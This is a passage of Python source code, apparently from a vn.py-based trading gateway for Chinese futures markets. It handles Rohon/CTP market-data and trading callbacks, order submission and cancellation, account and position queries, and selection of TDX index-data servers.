self.tdx_api.connect()
self.tdx_api.subscribe(req)
elif self.rabbit_api is not None:
# 使用rabbitmq获取
self.rabbit_api.subscribe(req)
elif self.tq_api:
# 使用天勤行情获取
self.tq_api.subscribe(req)
else:
# 上期所、上能源支持五档行情,使用天勤接口
if self.tq_api and req.exchange in [Exchange.SHFE, Exchange.INE]:
self.write_log(f'使用天勤接口订阅')
self.tq_api.subscribe(req)
else:
self.md_api.subscribe(req)
    def check_status(self):
        """检查状态"""
        if self.td_api is None or self.md_api is None:
            return False
        if self.td_api.connect_status and self.md_api.connect_status:
            self.status.update({'con': True})
        if self.tdx_api:
            self.tdx_api.check_status()
        if not self.td_api.connect_status or not self.md_api.connect_status:
            return False
        return True
def subscribe(self, req: SubscribeRequest):
""""""
try:
if self.md_api:
# 如果是自定义的套利合约符号
if req.symbol in self.combiner_conf_dict:
self.write_log(u'订阅自定义套利合约:{}'.format(req.symbol))
# 创建合成器
if req.symbol not in self.combiners:
setting = self.combiner_conf_dict.get(req.symbol)
setting.update({"symbol": req.symbol})
combiner = TickCombiner(self, setting)
# 更新合成器
self.write_log(u'添加{}与合成器映射'.format(req.symbol))
self.combiners.update({setting.get('symbol'): combiner})
# 增加映射( leg1 对应的合成器列表映射)
leg1_symbol = setting.get('leg1_symbol')
leg1_exchange = Exchange(setting.get('leg1_exchange'))
combiner_list = self.tick_combiner_map.get(leg1_symbol, [])
if combiner not in combiner_list:
self.write_log(u'添加Leg1:{}与合成器得映射'.format(leg1_symbol))
combiner_list.append(combiner)
self.tick_combiner_map.update({leg1_symbol: combiner_list})
# 增加映射( leg2 对应的合成器列表映射)
leg2_symbol = setting.get('leg2_symbol')
leg2_exchange = Exchange(setting.get('leg2_exchange'))
combiner_list = self.tick_combiner_map.get(leg2_symbol, [])
if combiner not in combiner_list:
self.write_log(u'添加Leg2:{}与合成器得映射'.format(leg2_symbol))
combiner_list.append(combiner)
self.tick_combiner_map.update({leg2_symbol: combiner_list})
self.write_log(u'订阅leg1:{}'.format(leg1_symbol))
leg1_req = SubscribeRequest(
symbol=leg1_symbol,
exchange=leg1_exchange
)
self.subscribe(leg1_req)
self.write_log(u'订阅leg2:{}'.format(leg2_symbol))
leg2_req = SubscribeRequest(
symbol=leg2_symbol,
exchange=leg2_exchange
)
self.subscribe(leg2_req)
self.subscribed_symbols.add((req.vt_symbol, req.is_bar))
else:
                        self.write_log(u'{}合成器已经存在'.format(req.symbol))
return
elif req.exchange == Exchange.SPD:
self.write_error(u'自定义合约{}不在CTP设置中'.format(req.symbol))
# 指数合约,从tdx行情订阅
if req.symbol[-2:] in ['99']:
req.symbol = req.symbol.upper()
if self.tdx_api:
self.write_log(f'使用通达信接口订阅{req.symbol}')
self.tdx_api.subscribe(req)
elif self.rabbit_api:
self.write_log(f'使用RabbitMQ接口订阅{req.symbol}')
self.rabbit_api.subscribe(req)
elif self.tq_api:
                        self.write_log(f'使用天勤接口订阅{req.symbol}')
self.tq_api.subscribe(req)
else:
# 上期所、上能源支持五档行情,使用天勤接口
if self.tq_api and req.exchange in [Exchange.SHFE, Exchange.INE]:
                        self.write_log(f'使用天勤接口订阅{req.symbol}')
self.tq_api.subscribe(req)
else:
self.write_log(f'使用CTP接口订阅{req.symbol}')
self.md_api.subscribe(req)
# Allow the strategies to start before the connection
self.subscribed_symbols.add((req.vt_symbol, req.is_bar))
if req.is_bar:
self.subscribe_bar(req)
except Exception as ex:
self.write_error(u'订阅合约异常:{},{}'.format(str(ex), traceback.format_exc()))
def subscribe_bar(self, req: SubscribeRequest):
"""订阅1分钟行情"""
vt_symbol = req.vt_symbol
if vt_symbol in self.klines:
return
# 创建1分钟bar产生器
self.write_log(u'创建:{}的一分钟行情产生器'.format(vt_symbol))
bg = BarGenerator(on_bar=self.on_bar)
self.klines.update({vt_symbol: bg})
def send_order(self, req: OrderRequest):
""""""
return self.td_api.send_order(req)
def cancel_order(self, req: CancelRequest):
""""""
self.td_api.cancel_order(req)
return True
def query_account(self):
""""""
self.td_api.query_account()
def query_position(self):
""""""
self.td_api.query_position()
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""查询K线历史"""
if self.tq_api:
return self.tq_api.query_history(req)
else:
return []
def close(self):
""""""
if self.md_api:
self.write_log('断开行情API')
tmp1 = self.md_api
self.md_api = None
tmp1.close()
if self.td_api:
self.write_log('断开交易API')
tmp2 = self.td_api
self.td_api = None
tmp2.close()
if self.tdx_api:
self.write_log(u'断开tdx指数行情API')
tmp3 = self.tdx_api
self.tdx_api = None
tmp3.close()
if self.rabbit_api:
self.write_log(u'断开rabbit MQ tdx指数行情API')
tmp4 = self.rabbit_api
self.rabbit_api = None
tmp4.close()
if self.tq_api:
            self.write_log(u'断开天勤行情API')
tmp5 = self.tq_api
self.tq_api = None
tmp5.close()
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < 2:
return
self.count = 0
func = self.query_functions.pop(0)
func()
self.query_functions.append(func)
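    # Note (editor's addition): process_timer_event() above and init_query() below
    # implement a simple round-robin poller. init_query() hooks process_timer_event()
    # onto the 1-second EVENT_TIMER; every second timer event one query function is
    # popped, called and re-appended, so query_account() and query_position() each
    # run roughly every 4 seconds.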
def init_query(self):
""""""
self.count = 0
self.query_functions = [self.query_account, self.query_position]
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def on_custom_tick(self, tick):
"""推送自定义合约行情"""
# 自定义合约行情
for combiner in self.tick_combiner_map.get(tick.symbol, []):
tick = copy(tick)
combiner.on_tick(tick)
class RohonMdApi(MdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(RohonMdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.connect_status = False
self.login_status = False
self.subscribed = set()
self.userid = ""
self.password = ""
self.brokerid = ""
def onFrontConnected(self):
"""
Callback when front server is connected.
"""
self.gateway.write_log("行情服务器连接成功")
self.login()
self.gateway.status.update({'md_con': True, 'md_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
def onFrontDisconnected(self, reason: int):
"""
Callback when front server is disconnected.
"""
self.login_status = False
self.gateway.write_log(f"行情服务器连接断开,原因{reason}")
self.gateway.status.update({'md_con': False, 'md_dis_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback when user is logged in.
"""
if not error["ErrorID"]:
self.login_status = True
self.gateway.write_log("行情服务器登录成功")
for symbol in self.subscribed:
self.subscribeMarketData(symbol)
else:
self.gateway.write_error("行情服务器登录失败", error)
def onRspError(self, error: dict, reqid: int, last: bool):
"""
Callback when error occured.
"""
self.gateway.write_error("行情接口报错", error)
def onRspSubMarketData(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error or not error["ErrorID"]:
return
self.gateway.write_error("行情订阅失败", error)
def onRtnDepthMarketData(self, data: dict):
"""
Callback of tick data update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
return
# 取当前时间
dt = datetime.now()
s_date = dt.strftime('%Y-%m-%d')
timestamp = f"{s_date} {data['UpdateTime']}.{int(data['UpdateMillisec'] / 100)}"
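        # UpdateMillisec is in milliseconds; dividing by 100 and truncating keeps only
        # the tenths-of-second digit, which "%f" right-pads back to microseconds below.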
dt = datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S.%f")
# 不处理开盘前的tick数据
if dt.hour in [8, 20] and dt.minute < 59:
return
if exchange is Exchange.CFFEX and dt.hour == 9 and dt.minute < 14:
return
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=dt,
date=s_date,
time=dt.strftime('%H:%M:%S.%f'),
trading_day=get_trading_date(dt),
name=symbol_name_map[symbol],
volume=data["Volume"],
open_interest=data["OpenInterest"],
last_price=data["LastPrice"],
limit_up=data["UpperLimitPrice"],
limit_down=data["LowerLimitPrice"],
open_price=adjust_price(data["OpenPrice"]),
high_price=adjust_price(data["HighestPrice"]),
low_price=adjust_price(data["LowestPrice"]),
pre_close=adjust_price(data["PreClosePrice"]),
bid_price_1=adjust_price(data["BidPrice1"]),
ask_price_1=adjust_price(data["AskPrice1"]),
bid_volume_1=data["BidVolume1"],
ask_volume_1=data["AskVolume1"],
gateway_name=self.gateway_name
)
# 处理一下标准套利合约的last_price
if '&' in symbol:
tick.last_price = (tick.ask_price_1 + tick.bid_price_1)/2
if data["BidVolume2"] or data["AskVolume2"]:
tick.bid_price_2 = adjust_price(data["BidPrice2"])
tick.bid_price_3 = adjust_price(data["BidPrice3"])
tick.bid_price_4 = adjust_price(data["BidPrice4"])
tick.bid_price_5 = adjust_price(data["BidPrice5"])
tick.ask_price_2 = adjust_price(data["AskPrice2"])
tick.ask_price_3 = adjust_price(data["AskPrice3"])
tick.ask_price_4 = adjust_price(data["AskPrice4"])
tick.ask_price_5 = adjust_price(data["AskPrice5"])
            tick.bid_volume_2 = data["BidVolume2"]
            tick.bid_volume_3 = data["BidVolume3"]
            tick.bid_volume_4 = data["BidVolume4"]
            tick.bid_volume_5 = data["BidVolume5"]
            tick.ask_volume_2 = data["AskVolume2"]
            tick.ask_volume_3 = data["AskVolume3"]
            tick.ask_volume_4 = data["AskVolume4"]
            tick.ask_volume_5 = data["AskVolume5"]
self.gateway.on_tick(tick)
self.gateway.on_custom_tick(tick)
def connect(self, address: str, userid: str, password: str, brokerid: int):
"""
Start connection to server.
"""
self.userid = userid
self.password = password
self.brokerid = brokerid
# If not connected, then start connection first.
if not self.connect_status:
path = get_folder_path(self.gateway_name.lower())
self.createFtdcMdApi(str(path) + "\\Md")
self.registerFront(address)
self.init()
self.connect_status = True
# If already connected, then login immediately.
elif not self.login_status:
self.login()
def login(self):
"""
Login onto server.
"""
req = {
"UserID": self.userid,
"Password": self.password,
"BrokerID": self.brokerid
}
self.reqid += 1
self.reqUserLogin(req, self.reqid)
def subscribe(self, req: SubscribeRequest):
"""
Subscribe to tick data update.
"""
if self.login_status:
self.gateway.write_log(f'订阅:{req.exchange} {req.symbol}')
self.subscribeMarketData(req.symbol)
self.subscribed.add(req.symbol)
def close(self):
"""
Close the connection.
"""
if self.connect_status:
self.exit()
class RohonTdApi(TdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(RohonTdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.order_ref = 0
self.connect_status = False
self.login_status = False
self.auth_staus = False
self.login_failed = False
self.userid = ""
self.password = ""
self.brokerid = ""
self.auth_code = ""
self.appid = ""
self.product_info = ""
self.frontid = 0
self.sessionid = 0
self.order_data = []
self.trade_data = []
self.positions = {}
self.sysid_orderid_map = {}
self.future_contract_changed = False
self.accountid = self.userid
def onFrontConnected(self):
""""""
self.gateway.write_log("交易服务器连接成功")
if self.auth_code:
self.authenticate()
else:
self.login()
self.gateway.status.update({'td_con': True, 'td_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
def onFrontDisconnected(self, reason: int):
""""""
self.login_status = False
self.gateway.write_log(f"交易服务器连接断开,原因{reason}")
        self.gateway.status.update({'td_con': False, 'td_dis_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
def onRspAuthenticate(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error['ErrorID']:
self.auth_staus = True
self.gateway.write_log("交易服务器授权验证成功")
self.login()
else:
self.gateway.write_error("交易服务器授权验证失败", error)
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error["ErrorID"]:
self.frontid = data["FrontID"]
self.sessionid = data["SessionID"]
self.login_status = True
self.gateway.write_log("交易服务器登录成功")
# Confirm settlement
req = {
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqSettlementInfoConfirm(req, self.reqid)
else:
self.login_failed = True
self.gateway.write_error("交易服务器登录失败", error)
def onRspOrderInsert(self, data: dict, error: dict, reqid: int, last: bool):
""""""
order_ref = data["OrderRef"]
orderid = f"{self.frontid}_{self.sessionid}_{order_ref}"
symbol = data["InstrumentID"]
exchange = symbol_exchange_map[symbol]
order_type = OrderType.LIMIT
if data["OrderPriceType"] == THOST_FTDC_OPT_LimitPrice and data["TimeCondition"] == THOST_FTDC_TC_IOC:
if data["VolumeCondition"] == THOST_FTDC_VC_AV:
order_type = OrderType.FAK
elif data["VolumeCondition"] == THOST_FTDC_VC_CV:
order_type = OrderType.FOK
if data["OrderPriceType"] == THOST_FTDC_OPT_AnyPrice:
order_type = OrderType.MARKET
order = OrderData(
symbol=symbol,
exchange=exchange,
accountid=self.accountid,
orderid=orderid,
type=order_type,
direction=DIRECTION_ROHON2VT[data["Direction"]],
offset=OFFSET_ROHON2VT.get(data["CombOffsetFlag"], Offset.NONE),
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
status=Status.REJECTED,
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.gateway.write_error("交易委托失败", error)
def onRspOrderAction(self, data: dict, error: dict, reqid: int, last: bool):
""""""
self.gateway.write_error("交易撤单失败", error)
def onRspQueryMaxOrderVolume(self, data: dict, error: dict, reqid: int, last: bool):
""""""
pass
def onRspSettlementInfoConfirm(self, data: dict, error: dict, reqid: int, last: bool):
"""
        Callback of settlement info confirmation.
"""
self.gateway.write_log("结算信息确认成功")
while True:
self.reqid += 1
n = self.reqQryInstrument({}, self.reqid)
if not n:
break
else:
sleep(1)
def onRspQryInvestorPosition(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not data:
return
if data.get("InstrumentID") not in symbol_exchange_map:
return
# Get buffered position object
key = f"{data['InstrumentID'], data['PosiDirection']}"
position = self.positions.get(key, None)
if not position:
position = PositionData(
accountid=self.accountid,
symbol=data["InstrumentID"],
exchange=symbol_exchange_map[data["InstrumentID"]],
direction=DIRECTION_ROHON2VT[data["PosiDirection"]],
gateway_name=self.gateway_name
)
self.positions[key] = position
# For SHFE position data update
if position.exchange in [Exchange.SHFE, Exchange.INE]:
if data["YdPosition"] and not data["TodayPosition"]:
position.yd_volume = data["Position"]
# For other exchange position data update
else:
position.yd_volume = data["Position"] - data["TodayPosition"]
# Get contract size (spread contract has no size value)
size = symbol_size_map.get(position.symbol, 0)
# Calculate previous position cost
cost = position.price * position.volume * size
# Update new position volume
position.volume += data["Position"]
position.pnl += data["PositionProfit"]
# Calculate average position price
if position.volume and size:
cost += data["PositionCost"]
position.price = cost / (position.volume * size)
# Get frozen volume
if position.direction == Direction.LONG:
position.frozen += data["ShortFrozen"]
else:
position.frozen += data["LongFrozen"]
if last:
for position in self.positions.values():
self.gateway.on_position(position)
self.positions.clear()
def onRspQryTradingAccount(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if self.gateway.debug:
print(f'onRspQryTradingAccount')
if "AccountID" not in data:
return
if len(self.accountid)== 0:
self.accountid = data['AccountID']
account = AccountData(
accountid=data["AccountID"],
pre_balance=round(float(data['PreBalance']), 7),
balance=round(float(data["Balance"]), 7),
frozen=round(data["FrozenMargin"] + data["FrozenCash"] + data["FrozenCommission"], 7),
gateway_name=self.gateway_name
)
account.available = round(float(data["Available"]), 7)
account.commission = round(float(data['Commission']), 7)
account.margin = round(float(data['CurrMargin']), 7)
account.close_profit = round(float(data['CloseProfit']), 7)
account.holding_profit = round(float(data['PositionProfit']), 7)
account.trading_day = str(data['TradingDay'])
if '-' not in account.trading_day and len(account.trading_day) == 8:
account.trading_day = '-'.join(
[
account.trading_day[0:4],
account.trading_day[4:6],
account.trading_day[6:8]
]
)
self.gateway.on_account(account)
def onRspQryInstrument(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of instrument query.
"""
#if self.gateway.debug:
# print(f'onRspQryInstrument')
product = PRODUCT_ROHON2VT.get(data["ProductClass"], None)
if product:
contract = ContractData(
symbol=data["InstrumentID"],
exchange=EXCHANGE_ROHON2VT[data["ExchangeID"]],
name=data["InstrumentName"],
product=product,
size=data["VolumeMultiple"],
pricetick=data["PriceTick"],
gateway_name=self.gateway_name
)
# 保证金费率
contract.margin_rate = max(data.get('LongMarginRatio', 0), data.get('ShortMarginRatio', 0))
if contract.margin_rate == 0:
contract.margin_rate = 0.1
# For option only
if contract.product == Product.OPTION:
# Remove C/P suffix of CZCE option product name
if contract.exchange == Exchange.CZCE:
contract.option_portfolio = data["ProductID"][:-1]
else:
contract.option_portfolio = data["ProductID"]
                contract.option_underlying = data["UnderlyingInstrID"]
                contract.option_type = OPTIONTYPE_ROHON2VT.get(data["OptionsType"], None)
                contract.option_strike = data["StrikePrice"]
                contract.option_index = str(data["StrikePrice"])
                contract.option_expiry = datetime.strptime(data["ExpireDate"], "%Y%m%d")
self.gateway.on_contract(contract)
symbol_exchange_map[contract.symbol] = contract.exchange
symbol_name_map[contract.symbol] = contract.name
symbol_size_map[contract.symbol] = contract.size
if contract.product == Product.FUTURES:
# 生成指数合约信息
underlying_symbol = data["ProductID"] # 短合约名称
underlying_symbol = underlying_symbol.upper()
# 只推送普通合约的指数
if len(underlying_symbol) <= 2:
idx_contract = index_contracts.get(underlying_symbol, None)
if idx_contract is None:
idx_contract = deepcopy(contract)
idx_contract.symbol = '{}99'.format(underlying_symbol)
idx_contract.name = u'{}指数'.format(underlying_symbol)
idx_contract.vt_symbol = f'{idx_contract.symbol}.{idx_contract.exchange.value}'
self.gateway.on_contract(idx_contract)
# 获取data/tdx/future_contracts.json中的合约记录
future_contract = future_contracts.get(underlying_symbol, {})
mi_contract_symbol = future_contract.get('mi_symbol', '')
margin_rate = float(future_contract.get('margin_rate', 0))
mi_margin_rate = round(idx_contract.margin_rate, 4)
if mi_contract_symbol == contract.symbol:
if margin_rate != mi_margin_rate:
self.gateway.write_log(
f"{underlying_symbol}合约主力{mi_contract_symbol} 保证金{margin_rate}=>{mi_margin_rate}")
future_contract.update({'margin_rate': mi_margin_rate})
future_contract.update({'symbol_size': idx_contract.size})
future_contract.update({'price_tick': idx_contract.pricetick})
future_contracts.update({underlying_symbol: future_contract})
self.future_contract_changed = True
index_contracts.update({underlying_symbol: idx_contract})
if last:
self.gateway.write_log("合约信息查询成功")
if self.future_contract_changed:
self.gateway.write_log('更新vnpy/data/tdx/future_contracts.json')
save_future_contracts(future_contracts)
for data in self.order_data:
self.onRtnOrder(data)
self.order_data.clear()
for data in self.trade_data:
self.onRtnTrade(data)
self.trade_data.clear()
def onRtnOrder(self, data: dict):
"""
Callback of order status update.
"""
if self.gateway.debug:
print(f'onRtnOrder')
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.order_data.append(data)
return
frontid = data["FrontID"]
sessionid = data["SessionID"]
order_ref = data["OrderRef"]
orderid = f"{frontid}_{sessionid}_{order_ref}"
order_type = OrderType.LIMIT
if data["OrderPriceType"] == THOST_FTDC_OPT_LimitPrice and data["TimeCondition"] == THOST_FTDC_TC_IOC:
if data["VolumeCondition"] == THOST_FTDC_VC_AV:
order_type = OrderType.FAK
elif data["VolumeCondition"] == THOST_FTDC_VC_CV:
order_type = OrderType.FOK
if data["OrderPriceType"] == THOST_FTDC_OPT_AnyPrice:
order_type = OrderType.MARKET
order = OrderData(
accountid=self.accountid,
symbol=symbol,
exchange=exchange,
orderid=orderid,
sys_orderid=data.get('OrderSysID', orderid),
type=order_type,
direction=DIRECTION_ROHON2VT[data["Direction"]],
offset=OFFSET_ROHON2VT[data["CombOffsetFlag"]],
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
traded=data["VolumeTraded"],
status=STATUS_ROHON2VT[data["OrderStatus"]],
time=data["InsertTime"],
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.sysid_orderid_map[data["OrderSysID"]] = orderid
def onRtnTrade(self, data: dict):
"""
Callback of trade status update.
"""
if self.gateway.debug:
print(f'onRtnTrade')
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.trade_data.append(data)
return
orderid = self.sysid_orderid_map[data["OrderSysID"]]
trade_date = data['TradeDate']
if '-' not in trade_date and len(trade_date) == 8:
trade_date = trade_date[0:4] + '-' + trade_date[4:6] + '-' + trade_date[6:8]
trade_time = data['TradeTime']
trade_datetime = datetime.strptime(f'{trade_date} {trade_time}', '%Y-%m-%d %H:%M:%S')
tradeid = data["TradeID"]
trade = TradeData(
accountid=self.accountid,
symbol=symbol,
exchange=exchange,
orderid=orderid,
sys_orderid=data.get("OrderSysID", orderid),
tradeid=tradeid.replace(' ',''),
direction=DIRECTION_ROHON2VT[data["Direction"]],
offset=OFFSET_ROHON2VT[data["OffsetFlag"]],
price=data["Price"],
volume=data["Volume"],
time=data["TradeTime"],
datetime=trade_datetime,
gateway_name=self.gateway_name
)
self.gateway.on_trade(trade)
def connect(
self,
address: str,
userid: str,
password: str,
brokerid: int,
auth_code: str,
appid: str,
product_info
):
"""
Start connection to server.
"""
self.userid = userid
self.password = password
self.brokerid = brokerid
self.auth_code = auth_code
self.appid = appid
self.product_info = product_info
if not self.connect_status:
path = get_folder_path(self.gateway_name.lower())
self.createFtdcTraderApi(str(path) + "\\Td")
self.subscribePrivateTopic(0)
self.subscribePublicTopic(0)
self.registerFront(address)
self.init()
self.connect_status = True
else:
self.authenticate()
def authenticate(self):
"""
Authenticate with auth_code and appid.
"""
req = {
"UserID": self.userid,
"BrokerID": self.brokerid,
"AuthCode": self.auth_code,
"AppID": self.appid
}
if self.product_info:
req["UserProductInfo"] = self.product_info
self.reqid += 1
self.reqAuthenticate(req, self.reqid)
def login(self):
"""
Login onto server.
"""
if self.login_failed:
return
req = {
"UserID": self.userid,
"Password": self.password,
"BrokerID": self.brokerid,
"AppID": self.appid
}
self.accountid = copy(self.userid)
if self.product_info:
req["UserProductInfo"] = self.product_info
self.reqid += 1
self.reqUserLogin(req, self.reqid)
def send_order(self, req: OrderRequest):
"""
Send new order.
"""
if self.gateway.debug:
print(f'send_order:{req.__dict__}')
if req.offset not in OFFSET_VT2ROHON:
self.gateway.write_log("请选择开平方向")
return ""
self.order_ref += 1
rohon_req = {
"InstrumentID": req.symbol,
"ExchangeID": req.exchange.value,
"LimitPrice": req.price,
"VolumeTotalOriginal": int(req.volume),
"OrderPriceType": ORDERTYPE_VT2ROHON.get(req.type, ""),
"Direction": DIRECTION_VT2ROHON.get(req.direction, ""),
"CombOffsetFlag": OFFSET_VT2ROHON.get(req.offset, ""),
"OrderRef": str(self.order_ref),
"InvestorID": self.userid,
"UserID": self.userid,
"BrokerID": self.brokerid,
"CombHedgeFlag": THOST_FTDC_HF_Speculation,
"ContingentCondition": THOST_FTDC_CC_Immediately,
"ForceCloseReason": THOST_FTDC_FCC_NotForceClose,
"IsAutoSuspend": 0,
"TimeCondition": THOST_FTDC_TC_GFD,
"VolumeCondition": THOST_FTDC_VC_AV,
"MinVolume": 1
}
if req.type == OrderType.FAK:
rohon_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
rohon_req["TimeCondition"] = THOST_FTDC_TC_IOC
rohon_req["VolumeCondition"] = THOST_FTDC_VC_AV
elif req.type == OrderType.FOK:
rohon_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
rohon_req["TimeCondition"] = THOST_FTDC_TC_IOC
rohon_req["VolumeCondition"] = THOST_FTDC_VC_CV
self.reqid += 1
self.reqOrderInsert(rohon_req, self.reqid)
orderid = f"{self.frontid}_{self.sessionid}_{self.order_ref}"
order = req.create_order_data(orderid, self.gateway_name)
order.accountid = self.accountid
order.vt_accountid = f"{self.gateway_name}.{self.accountid}"
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel existing order.
"""
frontid, sessionid, order_ref = req.orderid.split("_")
rohon_req = {
"InstrumentID": req.symbol,
"ExchangeID": req.exchange.value,
"OrderRef": order_ref,
"FrontID": int(frontid),
"SessionID": int(sessionid),
"ActionFlag": THOST_FTDC_AF_Delete,
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqOrderAction(rohon_req, self.reqid)
def query_account(self):
"""
Query account balance data.
"""
if self.gateway.debug:
print(f'query_account')
self.reqid += 1
self.reqQryTradingAccount({}, self.reqid)
def query_position(self):
"""
Query position holding data.
"""
if self.gateway.debug:
print(f'query_position')
if not symbol_exchange_map:
return
req = {
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqQryInvestorPosition(req, self.reqid)
def close(self):
""""""
if self.gateway.debug:
print(f'td close')
if self.connect_status:
self.exit()
def adjust_price(price: float) -> float:
""""""
if price == MAX_FLOAT:
price = 0
return price
class TdxMdApi():
"""
通达信数据行情API实现
订阅的指数行情,更新合约的数据
"""
def __init__(self, gateway):
self.gateway = gateway # gateway对象
self.gateway_name = gateway.gateway_name # gateway对象名称
self.req_interval = 0.5 # 操作请求间隔500毫秒
self.req_id = 0 # 操作请求编号
self.connection_status = False # 连接状态
self.symbol_exchange_dict = {} # tdx合约与vn交易所的字典
self.symbol_market_dict = {} # tdx合约与tdx市场的字典
self.symbol_vn_dict = {} # tdx合约与vt_symbol的对应
self.symbol_tick_dict = {} # tdx合约与最后一个Tick得字典
self.registered_symbol_set = set()
self.thread = None # 查询线程
self.ip_list = TDX_FUTURE_HOSTS
# 调出
self.best_ip = {} # 最佳IP地址和端口
self.api = None # API 的连接会话对象
self.last_tick_dt = datetime.now() # 记录该会话对象的最后一个tick时间
self.instrument_count = 50000
self.has_qry_instrument = False
# ----------------------------------------------------------------------
def ping(self, ip, port=7709):
"""
ping行情服务器
:param ip:
:param port:
:param type_:
:return:
"""
apix = TdxExHq_API()
__time1 = datetime.now()
try:
with apix.connect(ip, port):
if apix.get_instrument_count() > 10000:
_timestamp = (datetime.now() - __time1).total_seconds() * 1000
self.gateway.write_log('服务器{}:{},耗时:{}ms'.format(ip, port, _timestamp))
return _timestamp
else:
self.gateway.write_log(u'该服务器IP {}无响应.'.format(ip))
return timedelta(seconds=10).total_seconds() * 1000
except Exception as ex:
self.gateway.write_log(u'tdx ping服务器{},异常的响应{}'.format(ip, str(ex)))
return timedelta(seconds=10).total_seconds() * 1000
def sort_ip_speed(self):
"""
对所有服务器进行速度排序
:return:
"""
speed_result = []
for x in self.ip_list:
speed = self.ping(x['ip'], x['port'])
x.update({'speed': speed})
speed_result.append(copy(x))
# 更新服务器,按照速度排序
speed_result = sorted(speed_result, key=lambda s: s['speed'])
self.gateway.write_log(u'服务器访问速度排序:{}'.format(speed_result))
return speed_result
# ----------------------------------------------------------------------
def select_best_ip(self, exclude_ip: str = None):
"""
选择行情服务器
:param: exclude_ip, 排除的ip地址
:return:
"""
self.gateway.write_log(u'选择通达信行情服务器')
ip_list = self.sort_ip_speed()
valid_ip_list = [x for x in ip_list if x.get('speed', 10000) < 10000 and x.get('ip') != exclude_ip]
if len(valid_ip_list) == 0:
self.gateway.write_error(u'未能找到合适速度得行情服务器')
return None
best_future_ip = valid_ip_list[0]
save_cache_json(best_future_ip, TDX_FUTURE_CONFIG)
return best_future_ip
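    # Editor's note on the server-selection flow: connect() below first tries the
    # host cached in TDX_FUTURE_CONFIG (via get_cache_json); only when the cache is
    # empty does it call select_best_ip(), which pings every entry in
    # TDX_FUTURE_HOSTS, sorts them by round-trip time and caches the fastest one
    # with save_cache_json().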
def connect(self, is_reconnect=False):
"""
连接通达讯行情服务器
:param is_reconnect:是否重连
:return:
"""
# 创建api连接对象实例
try:
if self.api is None or not self.connection_status:
self.gateway.write_log(u'开始连接通达信行情服务器')
self.api = TdxExHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
# 选取最佳服务器
if is_reconnect or len(self.best_ip) == 0:
self.best_ip = get_cache_json(TDX_FUTURE_CONFIG)
if len(self.best_ip) == 0:
self.best_ip = self.select_best_ip()
self.api.connect(self.best_ip['ip'], self.best_ip['port'])
# 尝试获取市场合约统计
c = self.api.get_instrument_count()
if c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip['ip'], self.best_ip['port'])
self.gateway.write_error(err_msg)
else:
self.gateway.write_log(u'创建tdx连接, IP: {}/{}'.format(self.best_ip['ip'], self.best_ip['port']))
self.connection_status = True
self.gateway.status.update(
                        {'tdx_con': True, 'tdx_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
self.thread = Thread(target=self.run)
self.thread.start()
except Exception as ex:
self.gateway.write_log(u'连接服务器tdx异常:{},{}'.format(str(ex), traceback.format_exc()))
return
def close(self):
"""退出API"""
self.gateway.write_log(u'退出tdx API')
self.connection_status = False
if self.thread:
self.thread.join()
# ----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅合约"""
# 这里的设计是,如果尚未登录就调用了订阅方法
# 则先保存订阅请求,登录完成后会自动订阅
vn_symbol = str(subscribeReq.symbol)
vn_symbol = vn_symbol.upper()
self.gateway.write_log(u'通达信行情订阅 {}'.format(str(vn_symbol)))
if vn_symbol[-2:] != '99':
self.gateway.write_log(u'{}不是指数合约,不能订阅'.format(vn_symbol))
return
tdx_symbol = vn_symbol[0:-2] + 'L9'
tdx_symbol = tdx_symbol.upper()
self.gateway.write_log(u'{}=>{}'.format(vn_symbol, tdx_symbol))
self.symbol_vn_dict[tdx_symbol] = vn_symbol
if tdx_symbol not in self.registered_symbol_set:
self.registered_symbol_set.add(tdx_symbol)
self.check_status()
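    # Example of the index-symbol mapping performed above (symbols illustrative):
    #   vn.py index contract "RB99" -> TDX continuous code "RBL9"
    #   vn.py index contract "AP99" -> TDX continuous code "APL9"
    # Non-index symbols (not ending in "99") are rejected and never subscribed here.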
def check_status(self):
# self.write_log(u'检查tdx接口状态')
if len(self.registered_symbol_set) == 0:
return
# 若还没有启动连接,就启动连接
over_time = (datetime.now() - self.last_tick_dt).total_seconds() > 60
if not self.connection_status or self.api is None or over_time:
